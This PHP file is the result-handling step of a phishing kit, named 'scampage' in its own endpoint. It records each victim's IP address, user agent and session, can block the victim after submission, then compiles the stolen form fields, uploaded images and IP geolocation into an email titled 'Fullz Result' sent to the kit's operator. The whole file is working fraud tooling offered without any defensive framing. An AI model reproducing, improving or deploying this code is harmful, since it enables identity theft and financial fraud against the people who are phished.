<?php
require_once dirname(__FILE__) . '/header.php';

$main->apiGet('/scampage/_/visitor/action', [
    /**
     * Kind
     */
    'action' => 'FINISH',
    'from' => 'HTTP',

    /**
     * Visitor Information
     */
    'ip' => $main->ipGetAddress(),
    'useragent' => $_SERVER['HTTP_USER_AGENT'],
    'domain' => $_SERVER['SERVER_NAME'],
    'referer' => (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''),
    'sessionid' => $main->sessionGetID(),
    'protocol' => (isset($_SERVER['SERVER_PROTOCOL']) ? $_SERVER['SERVER_PROTOCOL'] : ''),
    'url' => (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]",
    'http' => base64_encode(json_encode($tmpHTTP)),
]);

//
$blockWhenFinishSubmit = $main->configurationGetProps()['blockWhenFinishSubmit'];
if ($blockWhenFinishSubmit) {
    // Now Block
    $main->blockerBlockNow($main->ipGetAddress());
}

//
$sendChunkedResultUntilFinish = $main->configurationGetProps()['sendChunkedResultUntilFinish'];
$sendResultAfterFinish = $main->configurationGetProps()['sendResultAfterFinish'];
if ($sendResultAfterFinish && !$sendChunkedResultUntilFinish) {
    $path = dirname(__FILE__) . '/../.wexler/tmpresult/' . $main->sessionGetID();

    $tmpBody = '';
    $img = [];
    
    foreach (scandir($path) as $key => $value) {
        if ($value === "upload") {
            foreach (scandir($path . '/upload') as $key2 => $value2) {
                if (strlen($value2) > 2 && is_file($path . '/upload/' . $value2)) {
                    $img[] = realpath($path . '/upload/' . $value2);

                }
            }

        } elseif (strlen($value) > 2 && is_file($path . '/' . $value)) {
            $data = json_decode(file_get_contents($path . '/' . $value), true);

            $tmpBody .= '[' . (isset($main->knownName[$data['type']]) ? $main->knownName[$data['type']] : $data['type']) . ']<br/>';

            unset($data['type']);

            foreach ($data as $key => $value) {
                $tmpBody .= "<b>" . (isset($main->knownName[$key]) ? $main->knownName[$key] : $key) . "</b>:&nbsp;" . htmlentities($value, ENT_QUOTES) . "<br/>";

            }


            $tmpBody .= '<br/>';

        }
    }

    $tmpBody .= '<br/>PC Info:<br/>'
             . ('<b>Domain:</b>&nbsp;' . str_replace(["."], "(.)", (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'n/a')))
             . ('<br/><b>Useragent:</b>&nbsp;' . $_SERVER['HTTP_USER_AGENT'])
             . ('<br/><b>IP Address:</b>&nbsp;' . $main->ipGetAddress())
             . ('<br/><b>IP Country:</b>&nbsp;' . (isset($main->ip['country']['name']) ? $main->ip['country']['name'] : 'n/a'))
             . ('<br/><b>IP City:</b>&nbsp;' . (isset($main->ip['city']) ? $main->ip['city'] : 'n/a'))
             . ('<br/><b>IP State:</b>&nbsp;' . (isset($main->ip['state']) ? $main->ip['state'] : 'n/a'))
             . ('<br/><b>IP ISP:</b>&nbsp;' . (isset($main->ip['isp']) ? $main->ip['isp'] : 'n/a'))
             . ('<br/><b>IP Timezone:</b>&nbsp;' . (isset($main->ip['timezone']['name']) ? $main->ip['timezone']['name'] : 'n/a'))
             . ('<br/><b>Session ID:</b>&nbsp;' . $main->sessionGetID());
    $main->sendmail('Fullz Result', $tmpBody, $img);
}

//
echo json_encode(['status' => true, 'message' => '']);
if (function_exists('fastcgi_finish_request')) {
    fastcgi_finish_request();
    
}